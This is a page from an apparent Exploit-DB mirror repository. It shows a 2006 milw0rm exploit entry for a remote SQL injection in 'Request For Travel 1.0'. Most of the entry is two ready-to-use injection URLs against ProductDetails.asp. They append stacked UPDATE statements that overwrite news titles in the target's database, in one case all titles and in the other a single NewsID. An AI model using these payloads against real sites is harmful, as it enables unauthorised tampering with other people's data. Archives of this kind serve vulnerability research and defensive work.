bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/asp/webapps/2908.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

30 lines
No EOL
797 B
Text
Raw Permalink Blame History

*************************************************************************************
# Title : Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# $$$ : $8,000
*************************************************************************************
[[SQL]]]
###http://[target]/[path]//ProductDetails.asp=[SQL]
Example:
-> All News Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--
-> Just NewsId Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--
[[/SQL]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-12-09]
Reference in a new issue View git blame Copy permalink